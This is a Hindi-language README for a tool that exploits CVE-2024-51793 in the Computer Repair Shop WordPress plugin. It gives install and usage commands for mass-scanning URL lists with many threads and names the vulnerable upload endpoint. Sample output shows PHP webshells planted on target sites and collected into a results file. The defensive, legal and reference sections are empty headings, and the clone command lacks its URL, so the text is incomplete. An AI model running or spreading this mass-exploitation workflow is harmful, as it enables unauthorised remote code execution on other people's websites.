
CVE-2024-51793 का शोषण करता है—WordPress Computer Repair Shop प्लगइन में बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड, लक्ष्य सूचियों को स्कैन करता है, PHP वेबशेल अपलोड करता है, और कमजोर साइटों की रिपोर्ट करता है।
CVE-2024-51793 शोषण उपकरण दस्तावेज़ 📋 अवलोकन CVE-2024-51793 कंप्यूटर रिपेयर शॉप WordPress प्लगइन (संस्करण 3.8116 से पहले) में एक अप्रमाणित मनमानी फ़ाइल अपलोड भेद्यता है। यह भेद्यता हमलावरों को प्रमाणीकरण के बिना PHP वेबशेल सहित मनमानी फ़ाइलें अपलोड करने की अनुमति देती है, जिससे असुरक्षित WordPress साइटों पर रिमोट कोड निष्पादन होता है।
🚨 भेद्यता विवरण CVE आईडी: CVE-2024-51793 भेद्यता प्रकार: अप्रमाणित मनमानी फ़ाइल अपलोड प्रभावित प्लगइन: Computer Repair Shop WordPress Plugin प्रभावित संस्करण: < 3.8116 जोखिम स्तर: गंभीर (CVSS स्कोर: 9.8)
🔧 तकनीकी विवरण यह भेद्यता प्लगइन में wc_upload_file_ajax एक्शन हैंडलर में मौजूद है, जो फ़ाइल प्रकारों और उपयोगकर्ता प्रमाणीकरण को ठीक से मान्य करने में विफल रहता है, जिससे अप्रमाणित हमलावर सीधे सर्वर पर दुर्भावनापूर्ण फ़ाइलें अपलोड कर सकते हैं।
📦 स्थापना और आवश्यकताएँ पूर्वापेक्षाएँ Python 3.6+
आवश्यक पैकेज: requests
स्थापना bash
git clone cd cve-2024-51793-exploit
pip install requests
pip install -r requirements.txt 🛠️ उपयोग गाइड मूल उपयोग bash python3 cve_2024_51793_exploit.py -l targets.txt -t 50 उन्नत उपयोग bash
python3 cve_2024_51793_exploit.py -l targets.txt -t 100 -o results
python3 cve_2024_51793_exploit.py -l urls.txt -t 50 --verbose कमांड लाइन तर्क Argument Short Description Default --list -l लक्ष्य URL वाली फ़ाइल का पथ (आवश्यक) - --threads -t समवर्ती थ्रेड्स की संख्या 50 --output -o परिणामों के लिए आउटपुट निर्देशिका results इनपुट फ़ाइल प्रारूप एक टेक्स्ट फ़ाइल (targets.txt) बनाएँ जिसमें प्रति पंक्ति एक URL हो:
text example.com https://vulnerable-site.com http://192.168.1.100/wordpress test-site.org/blog 🔍 यह कैसे काम करता है
text /wp-content/plugins/computer-repair-shop/readme.txt 2. संस्करण पहचान यह सत्यापित करता है कि प्लगइन में "CRM WordPress Plugin" शामिल है और संस्करण 3.8116 से नीचे है।
text POST /wp-admin/admin-ajax.php?action=wc_upload_file_ajax 4. वेबशेल पेलोड अपलोड किया गया वेबशेल प्रदान करता है:
📊 आउटपुट फ़ाइलें उपकरण दो मुख्य आउटपुट फ़ाइलें उत्पन्न करता है:
vulnerable_targets.txt - पुष्टि किए गए असुरक्षित URL की सूची
webshells.txt - सफलतापूर्वक अपलोड किए गए वेबशेल URL की सूची
🎯 उदाहरण निष्पादन bash $ python3 cve_2024_51793_exploit.py -l targets.txt -t 30
╔══════════════════════════════════════════════════════════════╗
║ ║
║ CVE-2024-51793 Exploit Tool ║
║ Unauthenticated RCE in Computer Repair Shop WP Plugin ║
║ ║
╚══════════════════════════════════════════════════════════════╝
[ INFO ] Loaded 150 unique targets [ INFO ] Starting scan with 30 threads
[ SCANNING ] Checking: http://example.com/ [ VULNERABLE ] Target identified: http://example.com/ [ SUCCESS ] Shell uploaded: http://example.com/wp-content/uploads/2024/05/3287428974_ktn.php
[ SCANNING ] Checking: http://testsite.com/ [ NOT VULNERABLE ] Target: http://testsite.com/
[ COMPLETED ] Scan finished successfully 🛡️ रक्षात्मक उपाय वेबसाइट मालिकों के लिए तत्काल कार्रवाई:
निवारक उपाय:
सुरक्षा शोधकर्ताओं के लिए
⚠️ कानूनी और नैतिक विचार
🔄 रखरखाव अद्यतन नियमित रूप से जाँचें:
समस्या निवारण सामान्य समस्याएँ और समाधान:
📞 समर्थन समस्याओं और सुधारों के लिए:
📚 संदर्भ
अस्वीकरण: इस उपकरण का उपयोग केवल वैध सुरक्षा अनुसंधान और अधिकृत पैठ परीक्षण के लिए किया जाना चाहिए। लेखक इस उपकरण के दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।